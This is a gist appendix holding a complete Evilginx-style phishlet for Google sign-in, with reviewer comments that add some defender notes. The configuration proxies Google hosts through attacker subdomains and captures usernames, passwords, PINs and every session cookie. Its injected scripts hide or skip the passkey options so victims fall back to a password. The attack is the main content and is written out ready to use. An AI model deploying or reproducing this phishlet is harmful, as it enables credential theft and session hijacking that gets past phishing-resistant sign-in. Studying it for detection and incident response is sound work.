
@resource-not-found
Created May 9, 2024 06:48
Appendix 1: Google Auth Phishlet
# Reverse-proxy phishing configuration for Google sign-in. The key layout
# (proxy_hosts, auth_tokens, credentials, js_inject) matches the Evilginx 3
# phishlet format; presumably that is the consuming tool, confirm against the
# report this appendix belongs to.
# NOTE(review): indentation has been lost in this copy, so nesting has to be
# read from the key names.
min_ver: '3.0.0'
# Presumably the page the visitor is sent to once capture has finished (TODO
# confirm). [ORIGIN_DOMAIN] appears to be a redaction placeholder.
redirect_url: 'https://www.[ORIGIN_DOMAIN].com/'
# Each entry pairs a real hostname (orig_sub + domain) with a subdomain
# (phish_sub) of the proxy's own domain. Only the first entry is flagged
# session/is_landing: the visitor arrives on 'training.<proxy domain>', which
# fronts accounts.google.com. The address bar and certificate therefore never
# show a Google-owned domain, and origin-bound credentials (WebAuthn security
# keys, passkeys) are not released to such a host. The list also includes
# accounts.google.ru alongside the .com hosts.
proxy_hosts:
- {phish_sub: 'training', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.ru', session: false, is_landing: false}
- {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'mail', orig_sub: 'mail', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'chat', orig_sub: 'chat', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'lh3', orig_sub: 'lh3', domain: 'google.com', session: false, is_landing: false}
- {phish_sub: 'www', orig_sub: 'www', domain: 'gstatic.com', session: false, is_landing: false}
- {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false}
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'youtube.com', session: false, is_landing: false}
- {phish_sub: 'signaler-pa', orig_sub: 'signaler-pa', domain: 'googleapis.com', session: false, is_landing: false}
- {phish_sub: 'ajax', orig_sub: 'ajax', domain: 'googleapis.com', session: false, is_landing: false}
# Cookies treated as the session to capture. The pattern '.*,regexp' matches
# every cookie name on both domains, so the whole post-login cookie set is
# taken rather than a named few. Those cookies represent a session that has
# already passed the password and any second step, so incident response has
# to revoke the account's active sessions, not only reset the password.
auth_tokens:
- domain: '.google.com'
keys: [".*,regexp"]
- domain: 'accounts.google.com'
keys: [".*,regexp"]
# POST fields recorded from the proxied sign-in forms: 'identifier',
# 'Passwd' and a custom 'Pin' field, each captured whole by '(.*)'.
credentials:
username:
key: 'identifier'
search: '(.*)'
type: 'post'
password:
key: 'Passwd'
search: '(.*)'
type: 'post'
custom:
- key: 'Pin'
search: '(.*)'
type: 'post'
# Request paths that presumably mark the sign-in as complete for the proxy;
# TODO confirm against the phishlet format documentation.
auth_urls:
- '/CheckCookie'
- '/RotateCookies'
# Sign-in entry point requested on the proxied host.
login:
domain: 'google.com'
path: '/v3/signin/identifier?flowName=WebLiteSignIn'
# Scripts added to proxied pages whose host and path match the triggers. They
# change what the visitor sees in the browser; each one starts by hiding the
# page body so the manipulation is not visible while it runs.
js_inject:
# Identifier page, triggered only when an 'email' parameter is present: fills
# #identifierId with the substituted {email} value and clicks #identifierNext
# after 3 seconds. If the field is not found the body is shown again untouched.
- trigger_domains: ["accounts.google.com"]
trigger_paths: ["/v3/signin/identifier"]
trigger_params: ["email"]
script: |
document.body.style.display = 'none';
function lp(){
document.querySelector('#identifierNext').click();
}
var email = document.querySelector('#identifierId');
if (email != null) {
email.value = '{email}';
setTimeout(function(){lp();}, 3000);
} else {
document.body.style.display = '';
}
# Password challenge page: hides the section three levels above the paragraph
# that mentions using "Try another way" (English or Russian text) and blanks
# the label of the "Try another way" button, then shows the page again. The
# effect is to remove the visible route to passkey sign-in and leave only the
# password field. Defender note: this is a downgrade away from the
# phishing-resistant factor; account policies that accept only security keys
# or passkeys for the second step leave no password-only path to fall back to.
- trigger_domains: ["accounts.google.com"]
trigger_paths: ["/v3/signin/challenge/pwd"]
script: |
document.body.style.display = 'none';
var paragraphs = Array.from(document.querySelectorAll('p'));
var targetParagraph = paragraphs.find(p =>
p.textContent.includes('Select "Try another way" to use') ||
p.textContent.includes('Чтобы использовать ключ доступа')
);
if (targetParagraph) {
var targetSection = targetParagraph.parentElement.parentElement.parentElement;
if (targetSection) {
targetSection.hidden = true;
}
}
var buttons = document.querySelectorAll('button');
buttons.forEach(button => {
if (button.textContent.trim() === 'Try another way' || button.textContent.trim() === 'Другой способ') {
button.textContent = '';
}
});
document.body.style.display = '';
# Passkey prompt page ('/challenge/pk/presend'): with the body hidden, clicks
# any button labelled "Try another way" (English or Russian) so the visitor is
# moved off the passkey prompt without seeing it. This script never restores
# the body; presumably the click navigates to another page.
- trigger_domains: ["accounts.google.com"]
trigger_paths: ["/v3/signin/challenge/pk/presend"]
script: |
document.body.style.display = 'none';
var buttons = document.querySelectorAll('button');
buttons.forEach(button => {
if (button.textContent.trim() === 'Try another way' || button.textContent.trim() === 'Другой способ') {
button.click();
}
});
# Sign-in method selection page: clicks the element two levels above the
# 'Enter your password' span and hides the element four levels above the
# 'Use your passkey' span (English or Russian labels), then shows the page
# again. The matched passkey span is also written to the browser console.
# As with the other challenge pages, the visible effect is that the
# origin-bound sign-in method is removed from the choices offered.
- trigger_domains: ["accounts.google.com"]
trigger_paths: ["/v3/signin/challenge/selection"]
script: |
document.body.style.display = 'none';
var spans = document.querySelectorAll('span');
spans.forEach(span => {
if (span.textContent.trim() === 'Enter your password' || span.textContent.trim() === 'Введите пароль') {
document.body.style.display = 'none';
span.parentElement.parentElement.click();
}
if (span.textContent.trim() === 'Use your passkey' || span.textContent.trim() === 'Использовать ключ доступа') {
console.log(span);
span.parentElement.parentElement.parentElement.parentElement.hidden = true;
}
});
document.body.style.display = '';
# '/v3/signin/rejected' page: replaces the paragraph that tells the user to
# contact the domain admin (English or Russian) with replacement HTML that
# offers a "change password" link and a mailto link to an administrator
# address; [ORIGIN_DOMAIN] appears to be a redaction placeholder.
# NOTE(review): myaccount.google.com is also listed under proxy_hosts, so the
# password link may be served through the proxy as well; confirm.
- trigger_domains: ["accounts.google.com"]
trigger_paths: ["/v3/signin/rejected"]
script: |
document.body.style.display = 'none';
var paragraphs = Array.from(document.querySelectorAll('p'));
var targetParagraph1 = paragraphs.find(p =>
p.textContent.includes('Contact your domain admin for help')
);
if (targetParagraph1) {
targetParagraph1.innerHTML = 'Use this link to change your password: <a href="https://myaccount.google.com/u/1/signinoptions/password">Change Password</a><br>or contact your domain admin for help: <a href="mailto:administrator@[ORIGIN_DOMAIN].org">Send Email</a>';
}
var targetParagraph2 = paragraphs.find(p =>
p.textContent.includes('Обратитесь за помощью к администратору домена')
);
if (targetParagraph2) {
targetParagraph2.innerHTML = 'Используйте эту ссылку для восстановления пароля: <a href="https://myaccount.google.com/u/1/signinoptions/password">Изменить пароль</a><br>или обратитесь за помощью к администратору домена: <a href="mailto:administrator@[ORIGIN_DOMAIN].org">Написать письмо</a>';
}
document.body.style.display = '';